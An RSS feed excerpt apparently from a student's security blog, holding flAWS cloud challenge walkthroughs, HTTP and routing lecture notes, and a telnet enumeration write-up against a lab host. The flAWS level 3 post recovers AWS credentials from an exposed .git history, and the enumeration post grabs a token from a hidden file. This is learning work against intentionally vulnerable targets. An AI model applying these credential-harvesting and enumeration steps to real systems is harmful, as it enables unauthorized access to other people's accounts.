255)">:</span><span class="token plain"> </span><span class="token string" style="color:rgb(195, 232, 141)">"arn:aws:iam::YOUR_ACCOUNT_ID:root"</span><span class="token plain"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">            </span><span class="token punctuation" style="color:rgb(199, 146, 234)">}</span><span class="token punctuation" style="color:rgb(199, 146, 234)">,</span><span class="token plain"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">            </span><span class="token property">"Action"</span><span class="token operator" style="color:rgb(137, 221, 255)">:</span><span class="token plain"> </span><span class="token string" style="color:rgb(195, 232, 141)">"s3:ListBucket"</span><span class="token punctuation" style="color:rgb(199, 146, 234)">,</span><span class="token plain"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">            </span><span class="token property">"Resource"</span><span class="token operator" style="color:rgb(137, 221, 255)">:</span><span class="token plain"> </span><span class="token string" style="color:rgb(195, 232, 141)">"arn:aws:s3:::level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud"</span><span class="token plain"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">        </span><span class="token punctuation" style="color:rgb(199, 146, 234)">}</span><span class="token plain"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">    </span><span class="token punctuation" style="color:rgb(199, 146, 234)">]</span><span class="token plain"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"></span><span class="token punctuation" style="color:rgb(199, 146, 234)">}</span><br></span></code></pre></div></div>
<p>anyway, grab that secret file name from the terminal output (secret-e4443fc.html), slap it onto the end of the level 2 URL, and let's head over to the next challenge page.</p>
<img width="661" height="212" alt="Screenshot 2026-06-10 at 14 37 21" src="https://github.com/user-attachments/assets/8b13712f-7101-42b2-b9a3-20d99c1f8d49">]]></content:encoded>
            <category>cloud</category>
            <category>aws</category>
            <category>s3</category>
            <category>iam</category>
            <category>acl</category>
            <category>pentesting</category>
        </item>
        <item>
            <title><![CDATA[flAWS level 3]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/06/10/flaws3</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/06/10/flaws3</guid>
            <pubDate>Wed, 10 Jun 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[okay so ...]]></description>
            <content:encoded><![CDATA[<p>okay so ...</p>
<img width="772" height="707" alt="Screenshot 2026-06-10 at 22 01 52" src="https://github.com/user-attachments/assets/50517b98-6a89-4569-8f35-672de46e295f">
<p>check which files exists .. using ls ....</p>
<img width="736" height="182" alt="Screenshot 2026-06-10 at 22 02 12" src="https://github.com/user-attachments/assets/24d29ca3-e603-4729-a7f5-5dd401888214">
<p>then make one temp dir and cp .git to your local system ...</p>
<img width="1467" height="707" alt="Screenshot 2026-06-10 at 22 07 09" src="https://github.com/user-attachments/assets/7a92c9bd-3b31-4e16-b75a-cba1aa158267">
<p>now check git history using git log ...</p>
<img width="534" height="236" alt="Screenshot 2026-06-10 at 22 08 48" src="https://github.com/user-attachments/assets/743e3bfb-9e0e-4b34-b942-c6e983c71900">
<p>now use git stat to see the changes and all.</p>
<img width="548" height="289" alt="Screenshot 2026-06-10 at 22 11 12" src="https://github.com/user-attachments/assets/fe3544d2-1725-4bd0-ac73-59896ddea001">
<p>now just configure using the credntials you just got .. and</p>
<img width="1003" height="290" alt="Screenshot 2026-06-10 at 22 12 18" src="https://github.com/user-attachments/assets/09b1f14d-b8a7-43c5-acbf-810279c3225e">
<p>and with that .. ls output contains link to level 4 ..</p>
<img width="604" height="215" alt="Screenshot 2026-06-10 at 22 13 57" src="https://github.com/user-attachments/assets/1fa83036-5f71-4d2d-ba0d-0b9c95520e0b">
<p>and you are done!!</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Understanding HTTP]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/http</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/http</guid>
            <pubDate>Tue, 09 Jun 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Note https://youtu.be/a3C1DMswClQ?si=VkYrm_9JAlL3n0]]></description>
            <content:encoded><![CDATA[<p>Note: These are notes from HTTP lecture/video by Sriniously : <a href="https://youtu.be/a3C1DMswClQ?si=VkYrm___9JAlL3n0" target="_blank" rel="noopener noreferrer" class="">https://youtu.be/a3C1DMswClQ?si=VkYrm___9JAlL3n0</a></p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="1-core-principles-of-http"><em>1. Core Principles of HTTP</em><a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/http#1-core-principles-of-http" class="hash-link" aria-label="Direct link to 1-core-principles-of-http" title="Direct link to 1-core-principles-of-http" translate="no">​</a></h3>
<p>HTTP (Hypertext Transfer Protocol) is an application-layer protocol (Layer 7 in the OSI model) used by clients and servers to communicate. It is built on two fundamental ideas:</p>
<ul>
<li class=""><em>Statelessness:</em> The server retains no memory of past interactions. Every request is entirely self-contained and must include all the necessary information (like authentication tokens or cookies) for the server to process it.<!-- -->
<ul>
<li class="">Benefits: This simplifies server architecture and improves scalability, because a single server doesn't need to keep track of user sessions, and a server crash won't destroy a client's state.</li>
</ul>
</li>
<li class=""><em>Client-Server Model:</em> Communication is always initiated by the client (e.g., a web browser) to request resources or actions, and the server waits for these requests to process and respond.</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="2-transport-protocol--http-versions"><em>2. Transport Protocol &amp; HTTP Versions</em><a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/http#2-transport-protocol--http-versions" class="hash-link" aria-label="Direct link to 2-transport-protocol--http-versions" title="Direct link to 2-transport-protocol--http-versions" translate="no">​</a></h3>
<p>HTTP relies on a reliable, connection-based transport protocol, almost universally <strong>TCP (Transmission Control Protocol)</strong>. Over the years, HTTP has evolved to improve how these TCP connections are handled:</p>
<ul>
<li class=""><em>HTTP 1.0:</em> Opened a new TCP connection for every single request and response, which was highly inefficient and slow.</li>
<li class=""><em>HTTP 1.1:</em> Introduced <em>persistent connections</em> (<code>keep-alive</code>) as the default, allowing multiple requests to be sent over a single reused connection.</li>
<li class=""><em>HTTP 2.0:</em> Introduced multiplexing (multiple requests/responses concurrently on one connection), binary framing, header compression, and server push.</li>
<li class=""><em>HTTP 3.0:</em> Replaced TCP with QUIC (built over UDP) to establish faster connections and handle packet loss better, eliminating head-of-line blocking.</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="3-anatomy-of-http-messages"><em>3. Anatomy of HTTP Messages</em><a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/http#3-anatomy-of-http-messages" class="hash-link" aria-label="Direct link to 3-anatomy-of-http-messages" title="Direct link to 3-anatomy-of-http-messages" translate="no">​</a></h3>
<p>Client-server communication happens via structured text messages.</p>
<ul>
<li class=""><em>Request Message (Client to Server):</em> Contains a Request Method (e.g., GET/POST), the Resource URL, the HTTP version, Host domain, Headers, a blank line, and an optional Request Body.</li>
<li class=""><em>Response Message (Server to Client):</em> Contains the HTTP version, a Status Code (e.g., 200), a Status Value (e.g., OK), Headers, a blank line, and the Response Body.</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="4-http-headers"><em>4. HTTP Headers</em><a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/http#4-http-headers" class="hash-link" aria-label="Direct link to 4-http-headers" title="Direct link to 4-http-headers" translate="no">​</a></h3>
<p>Headers are key-value pairs that act as metadata for the package being transmitted, allowing the system to be highly extensible and act as a "remote control" to dictate server behavior.</p>
<ul>
<li class=""><em>Request Headers:</em> Sent by the client to provide context (e.g., <code>User-Agent</code> identifies the browser, <code>Authorization</code> sends credentials).</li>
<li class=""><em>General Headers:</em> Apply to both requests and responses (e.g., <code>Date</code>, <code>Connection</code>, <code>Cache-Control</code>).</li>
<li class=""><em>Representation Headers:</em> Describe the message body (e.g., <code>Content-Type</code> for media format like JSON/HTML, <code>Content-Length</code> for byte size, <code>Content-Encoding</code> for gzip compression).</li>
<li class=""><em>Security Headers:</em> Protect against attacks (e.g., <code>Strict-Transport-Security</code> forces HTTPS, <code>Content-Security-Policy</code> prevents cross-site scripting, <code>Set-Cookie</code> with HTTP-only flags).</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="5-http-methods-and-idempotency"><em>5. HTTP Methods and Idempotency</em><a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/http#5-http-methods-and-idempotency" class="hash-link" aria-label="Direct link to 5-http-methods-and-idempotency" title="Direct link to 5-http-methods-and-idempotency" translate="no">​</a></h3>
<p>Methods define the semantic <em>intent</em> of the client's request.</p>
<ul>
<li class=""><em>GET:</em> Fetches data from the server without modifying anything.</li>
<li class=""><em>POST:</em> Submits new data to the server (includes a request body).</li>
<li class=""><em>PATCH:</em> Partially updates an existing resource.</li>
<li class=""><em>PUT:</em> Completely replaces an existing resource with the provided body.</li>
<li class=""><em>DELETE:</em> Removes a resource.</li>
<li class=""><em>OPTIONS:</em> Inquires about the server's capabilities (used heavily in CORS).</li>
</ul>
<p><em>Idempotency</em> is a crucial concept here:</p>
<ul>
<li class=""><em>Idempotent Methods:</em> Can be executed multiple times and yield the exact same result on the server state (e.g., GET, PUT, DELETE).</li>
<li class=""><em>Non-Idempotent Methods:</em> Running them multiple times creates different results (e.g., submitting a POST request twice creates two separate resources).</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="6-cross-origin-resource-sharing-cors"><em>6. Cross-Origin Resource Sharing (CORS)</em><a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/http#6-cross-origin-resource-sharing-cors" class="hash-link" aria-label="Direct link to 6-cross-origin-resource-sharing-cors" title="Direct link to 6-cross-origin-resource-sharing-cors" translate="no">​</a></h3>
<p>Browsers enforce a Same-Origin Policy, blocking web apps from making requests to different domains (origins). CORS is a security mechanism to bypass this safely.</p>
<ul>
<li class=""><em>Simple Requests:</em> (Usually GET or POST with standard headers/content types). The browser automatically adds an <code>Origin</code> header. If the server allows the request, it replies with the <code>Access-Control-Allow-Origin</code> header containing the client's domain (or a <code>*</code> wildcard). If missing, the browser blocks the response.</li>
<li class=""><em>Pre-flight Requests:</em> Triggered if a request uses a non-simple method (PUT/DELETE), requires authorization headers, or uses a <code>application/json</code> content type.<!-- -->
<ul>
<li class="">The browser first fires an <em>OPTIONS</em> request asking the server if the route supports the intended method and headers.</li>
<li class="">The server replies with a <code>204 No Content</code> status, explicitly listing allowed origins, methods, headers, and a <code>max-age</code> to cache this configuration.</li>
<li class="">If successful, the browser then sends the actual, original request.</li>
</ul>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="7-standardized-status-codes"><em>7. Standardized Status Codes</em><a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/http#7-standardized-status-codes" class="hash-link" aria-label="Direct link to 7-standardized-status-codes" title="Direct link to 7-standardized-status-codes" translate="no">​</a></h3>
<p>Status codes are three-digit numbers that act as a universal language to indicate the outcome of a request.</p>
<ul>
<li class=""><em>1xx (Informational):</em> Indicates headers received; client can proceed (e.g., <code>100 Continue</code> for large uploads).</li>
<li class=""><em>2xx (Success):</em>
<ul>
<li class=""><code>200 OK</code>: Successful operation.</li>
<li class=""><code>201 Created</code>: Usually follows a POST request.</li>
<li class=""><code>204 No Content</code>: Successful, but no body to return (used in OPTIONS or DELETE).</li>
</ul>
</li>
<li class=""><em>3xx (Redirection):</em>
<ul>
<li class=""><code>301 Moved Permanently</code>: The resource has a new URL.</li>
<li class=""><code>302 Found/Temporary Redirect</code>: Temporarily forward to a new route.</li>
<li class=""><code>304 Not Modified</code>: Tells the client to use its locally cached version.</li>
</ul>
</li>
<li class=""><em>4xx (Client Errors):</em>
<ul>
<li class=""><code>400 Bad Request</code>: Invalid data format sent by client.</li>
<li class=""><code>401 Unauthorized</code>: Missing or invalid authentication token.</li>
<li class=""><code>403 Forbidden</code>: Authenticated, but lacks necessary permissions.</li>
<li class=""><code>404 Not Found</code>: Incorrect URL or deleted resource.</li>
<li class=""><code>405 Method Not Allowed</code>: Using the wrong method for a route.</li>
<li class=""><code>409 Conflict</code>: Business logic violation (e.g., duplicate username).</li>
<li class=""><code>429 Too Many Requests</code>: Client has hit rate limits.</li>
</ul>
</li>
<li class=""><em>5xx (Server Errors):</em>
<ul>
<li class=""><code>500 Internal Server Error</code>: An unhandled exception crashed the server.</li>
<li class=""><code>501 Not Implemented</code>: Feature not yet supported.</li>
<li class=""><code>502 Bad Gateway</code> / <code>504 Gateway Timeout</code>: Issues originating from proxies or load balancers failing to reach upstream servers.</li>
<li class=""><code>503 Service Unavailable</code>: Server down or under maintenance.</li>
</ul>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="8-http-caching"><em>8. HTTP Caching</em><a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/http#8-http-caching" class="hash-link" aria-label="Direct link to 8-http-caching" title="Direct link to 8-http-caching" translate="no">​</a></h3>
<p>Caching reuses previously downloaded responses to save bandwidth and load times.</p>
<ul>
<li class="">When a client first fetches a resource, the server responds with the payload alongside three headers: <code>Cache-Control</code> (sets max duration), <code>ETag</code> (a unique hash of the payload), and <code>Last-Modified</code>.</li>
<li class="">On subsequent requests, the client sends conditional headers: <code>If-None-Match</code> (carrying the ETag) or <code>If-Modified-Since</code>.</li>
<li class="">If the data on the server hasn't changed, the server saves bandwidth by sending an empty <code>304 Not Modified</code> response, instructing the browser to use its cached copy. If it has changed, it sends a <code>200 OK</code> with the new data and a new ETag.</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="9-content-negotiation-and-compression"><em>9. Content Negotiation and Compression</em><a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/http#9-content-negotiation-and-compression" class="hash-link" aria-label="Direct link to 9-content-negotiation-and-compression" title="Direct link to 9-content-negotiation-and-compression" translate="no">​</a></h3>
<p>Clients and servers can negotiate the best format to exchange data.</p>
<ul>
<li class="">The client sends preferences via <code>Accept</code> (e.g., <code>application/json</code> vs <code>application/xml</code>), <code>Accept-Language</code> (e.g., <code>en</code> vs <code>es</code>), and <code>Accept-Encoding</code> (e.g., <code>gzip</code>).</li>
<li class="">The server responds with the appropriate format.</li>
<li class=""><em>Compression:</em> By negotiating an encoding like <code>gzip</code>, a server can drastically compress text responses (e.g., shrinking a 26MB JSON payload down to 3.8MB) to save massive amounts of network bandwidth.</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="10-handling-large-data-transfers"><em>10. Handling Large Data Transfers</em><a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/http#10-handling-large-data-transfers" class="hash-link" aria-label="Direct link to 10-handling-large-data-transfers" title="Direct link to 10-handling-large-data-transfers" translate="no">​</a></h3>
<ul>
<li class=""><em>Large Client Uploads (Images/Video):</em> Standard JSON is terrible for binary data. Instead, clients use a <code>multipart/form-data</code> request. This breaks the file into chunks separated by a unique string delimiter defined in the <code>boundary</code> header.</li>
<li class=""><em>Large Server Downloads:</em> To prevent timing out, the server streams the file in chunks using <code>Content-Type: text/event-stream</code> and <code>Connection: keep-alive</code>. The browser continually appends these chunks until the transfer finishes.</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="11-security-ssltls--https"><em>11. Security (SSL/TLS &amp; HTTPS)</em><a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/http#11-security-ssltls--https" class="hash-link" aria-label="Direct link to 11-security-ssltls--https" title="Direct link to 11-security-ssltls--https" translate="no">​</a></h3>
<ul>
<li class=""><em>TLS (Transport Layer Security):</em> The modern, secure replacement for the outdated SSL protocol.</li>
<li class="">It encrypts data in transit to prevent interception (eavesdropping) or tampering, utilizing certificates to verify the server's identity.</li>
<li class=""><em>HTTPS:</em> Simply the standard HTTP protocol wrapped inside a secure TLS connection.</li>
</ul>]]></content:encoded>
            <category>cybersecurity</category>
            <category>web</category>
            <category>web fundamentals</category>
            <category>http</category>
            <category>http basics</category>
            <category>backend</category>
        </item>
        <item>
            <title><![CDATA[Routing]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/routing</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/routing</guid>
            <pubDate>Tue, 09 Jun 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Note https://youtu.be/SubuU1iOC2s?si=Rq3nCiC4bbwIVXsI]]></description>
            <content:encoded><![CDATA[<p>Note: These are notes from Routing lecture/video by Sriniously : <a href="https://youtu.be/SubuU1iOC2s?si=Rq3nCiC4bbwIVXsI" target="_blank" rel="noopener noreferrer" class="">https://youtu.be/SubuU1iOC2s?si=Rq3nCiC4bbwIVXsI</a></p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="1-what-is-routing"><em>1. What is Routing?</em><a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/routing#1-what-is-routing" class="hash-link" aria-label="Direct link to 1-what-is-routing" title="Direct link to 1-what-is-routing" translate="no">​</a></h3>
<ul>
<li class=""><em>The "What" vs. The "Where":</em> In a backend system, HTTP methods (like GET, POST, DELETE) express the what or the intent of a request (e.g., fetching or adding data). Routing expresses the <em>where</em>—the specific resource or destination you want to apply that action to.</li>
<li class=""><em>Definition:</em> Routing is the process of mapping a combination of an HTTP method and a URL path to a specific server-side Handler (a set of instructions or business logic).</li>
<li class=""><em>Uniqueness:</em> The server concatenates the HTTP method and the route to form a unique key. For example, a <code>GET</code> request to <code>/api/books</code> and a <code>POST</code> request to <code>/api/books</code> will trigger completely different logic in the server without clashing.</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="2-types-of-routes"><em>2. Types of Routes</em><a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/routing#2-types-of-routes" class="hash-link" aria-label="Direct link to 2-types-of-routes" title="Direct link to 2-types-of-routes" translate="no">​</a></h3>
<p>There are two primary ways to structure a route path:</p>
<ul>
<li class=""><em>Static Routes:</em> These are constant strings that do not contain any variable parameters. For example, <code>/api/books</code> will always stay consistent and point to the same general resource.</li>
<li class=""><em>Dynamic Routes:</em> These include variable slots within the URL that the server can extract as data. In most backend frameworks (like Node.js, Python, or Go), these are denoted by a colon, such as <code>/api/users/:id</code>. If a client requests <code>/api/users/123</code>, the server extracts "123" as the ID to fetch that specific user's data.</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="3-path-parameters-vs-query-parameters"><em>3. Path Parameters vs. Query Parameters</em><a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/routing#3-path-parameters-vs-query-parameters" class="hash-link" aria-label="Direct link to 3-path-parameters-vs-query-parameters" title="Direct link to 3-path-parameters-vs-query-parameters" translate="no">​</a></h3>
<p>When sending data through a URL, backend engineers use two distinct types of parameters:</p>
<ul>
<li class=""><em>Path Parameters (Route Parameters):</em> These are the variables placed directly inside the route's path, right after a forward slash <code>/</code> (e.g., the <code>123</code> in <code>/api/users/123</code>). They are used to express <strong>semantic meaning</strong>, specifically identifying a unique resource.</li>
<li class=""><em>Query Parameters:</em> Because <code>GET</code> requests do not have a data body, query parameters are used to send key-value pairs of metadata to the server.<!-- -->
<ul>
<li class=""><em>Syntax:</em> They are attached to the end of the route after a question mark <code>?</code> (e.g., <code>/api/search?query=some+value</code>).</li>
<li class=""><em>Use Cases:</em> They are heavily used for <em>pagination</em> (e.g., <code>page=2&amp;limit=20</code>), filtering user-defined values, or determining sorting orders (ascending/descending).</li>
</ul>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="4-nested-routing"><em>4. Nested Routing</em><a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/routing#4-nested-routing" class="hash-link" aria-label="Direct link to 4-nested-routing" title="Direct link to 4-nested-routing" translate="no">​</a></h3>
<p>Nested routing is a standard REST API practice used to express a hierarchy between different resources.</p>
<ul>
<li class=""><em>Semantic Hierarchy:</em> By nesting paths, you create a highly readable, semantic expression of what data you want.</li>
<li class=""><em>Example Workflow:</em>
<ul>
<li class=""><code>/api/users</code>: Fetches a list of all users.</li>
<li class=""><code>/api/users/123</code>: Goes one level deep to fetch a specific user.</li>
<li class=""><code>/api/users/123/posts</code>: Goes another level deep to fetch all posts created by user 123.</li>
<li class=""><code>/api/users/123/posts/456</code>: Fetches one highly specific post (ID 456) belonging to that specific user.</li>
</ul>
</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="5-route-versioning-and-deprecation"><em>5. Route Versioning and Deprecation</em><a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/routing#5-route-versioning-and-deprecation" class="hash-link" aria-label="Direct link to 5-route-versioning-and-deprecation" title="Direct link to 5-route-versioning-and-deprecation" translate="no">​</a></h3>
<p>As applications grow, business requirements change, which might require you to completely alter the format of the data your API returns (e.g., switching the key <code>name</code> to <code>title</code>).</p>
<ul>
<li class=""><em>The Problem:</em> If you change the response format on a live route, you will break the frontend application (like an iOS or React app) currently relying on it.</li>
<li class=""><em>The Solution (Versioning):</em> Engineers add version numbers to routes, such as <code>/api/v1/products</code> and <code>/api/v2/products</code>.</li>
<li class=""><em>Deprecation:</em> This allows the server to simultaneously support both the old and new data structures. It provides frontend engineers a safe window of time to migrate their code to <code>v2</code> before the backend team officially deprecates and removes <code>v1</code>.</li>
</ul>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="6-catch-all-routes"><em>6. Catch-All Routes</em><a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/09/routing#6-catch-all-routes" class="hash-link" aria-label="Direct link to 6-catch-all-routes" title="Direct link to 6-catch-all-routes" translate="no">​</a></h3>
<ul>
<li class=""><em>Purpose:</em> A catch-all route acts as a safety net for invalid requests.</li>
<li class=""><em>How it Works:</em> It is placed at the very end of the server's routing logic, often using a wildcard syntax like <code>/*</code>. If a request trickles down through all the previous route matching algorithms without finding a match, it hits the catch-all.</li>
<li class=""><em>Benefit:</em> Instead of the server defaulting to a broken or null response, the catch-all handler cleanly returns a user-friendly "Route Not Found" (404) message to the client.</li>
</ul>]]></content:encoded>
            <category>cybersecurity</category>
            <category>web</category>
            <category>web fundamentals</category>
            <category>routing</category>
            <category>backend</category>
        </item>
        <item>
            <title><![CDATA[Hands-On Protocol Enumeration: Dismantling Network Abstractions with Telnet]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/06/03/protocols</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/06/03/protocols</guid>
            <pubDate>Wed, 03 Jun 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[In modern network security, we rely heavily on automated scanners, framework-driven exploitation tools, and high-level clients to interact with remote infrastructure. While these tools offer undeniable efficiency, they often obscure the mechanics of the underlying protocols. True fluency in network security requires the ability to strip away these layers of abstraction and speak directly to services in their native dialects.]]></description>
            <content:encoded><![CDATA[<p>In modern network security, we rely heavily on automated scanners, framework-driven exploitation tools, and high-level clients to interact with remote infrastructure. While these tools offer undeniable efficiency, they often obscure the mechanics of the underlying protocols. True fluency in network security requires the ability to strip away these layers of abstraction and speak directly to services in their native dialects.</p>
<p>This write-up explores a hands-on protocol enumeration exercise targeting a Linux-based host (<code>10.49.179.14</code>). By bypassing automated suites and utilizing raw network utilities like <code>telnet</code>, we manually map, authenticate, and interact with five foundational application-layer protocols: <strong>HTTP, FTP, SMTP, POP3, and IMAP</strong>. We then corroborate our manual findings with an automated <code>nmap</code> service audit to analyze how scanners interpret these raw network responses.</p>
<hr>
<h1>Technical Environment</h1>
<ul>
<li class=""><strong>Attacking Platform:</strong> Unix/Linux Shell (Zsh)</li>
<li class=""><strong>Target IP Address:</strong> <code>10.49.179.14</code></li>
<li class=""><strong>Target Operating System:</strong> Linux (Ubuntu/Fedora-derived target ecosystem)</li>
<li class=""><strong>Tools Utilized:</strong> <code>telnet</code>, <code>ftp</code>, <code>nmap</code></li>
</ul>
<hr>
<h1>1. Manual Service Enumeration via Cleartext Protocols</h1>
<h2 class="anchor anchorTargetStickyNavbar_Vzrq" id="http-port-80--navigating-virtual-hosts">HTTP (Port 80) — Navigating Virtual Hosts<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/03/protocols#http-port-80--navigating-virtual-hosts" class="hash-link" aria-label="Direct link to HTTP (Port 80) — Navigating Virtual Hosts" title="Direct link to HTTP (Port 80) — Navigating Virtual Hosts" translate="no">​</a></h2>
<p>Initial attempts to interact with the HTTP service on port 80 demonstrated how modern web servers handle incoming traffic routing based on HTTP headers rather than just IP addresses.</p>
<p>A generic connection followed by a standard command string triggered a client-side routing failure:</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain">$ telnet 10.49.179.14 80</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Trying 10.49.179.14...</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Connected to 10.49.179.14.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Escape character is '^]'.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">GET /index.html HTTP/1.1</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">HTTP/1.1 400 Bad Request</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Server: nginx/1.18.0 (Ubuntu)</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Connection: close</span><br></span></code></pre></div></div>
<p>The server responded with an HTTP <code>400 Bad Request</code> status code. Because modern web servers frequently host multiple web applications on a single IP address (Virtual Hosting), Nginx requires an explicit <code>Host</code> header to determine which server block should receive the request.</p>
<p>By re-establishing the session and manually crafting a valid HTTP request containing the appropriate Host header routing (<code>host: telnet</code>), the server successfully processed the request, yielding a <code>200 OK</code> response along with the raw HTML payload:</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain">$ telnet 10.49.179.14 80</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Trying 10.49.179.14...</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Connected to 10.49.179.14.</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">GET /index.html HTTP/1.1</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">host: telnet</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">HTTP/1.1 200 OK</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Server: nginx/1.18.0 (Ubuntu)</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Content-Type: text/html</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Content-Length: 234</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">Connection: keep-alive</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">&lt;!DOCTYPE html&gt;</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">&lt;html lang="en"&gt;</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">&lt;head&gt;</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">  &lt;title&gt;Welcome to my Web Server&lt;/title&gt;</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">&lt;/head&gt;</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">&lt;body&gt;</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">  &lt;h1&gt;Coming Soon&lt;/h1&gt;</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">&lt;/body&gt;</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">&lt;/html&gt;</span><br></span></code></pre></div></div>
<p>With a stable keep-alive connection, a secondary manual request was issued to target hidden files directly on the server, successfully exfiltrating an application token:</p>
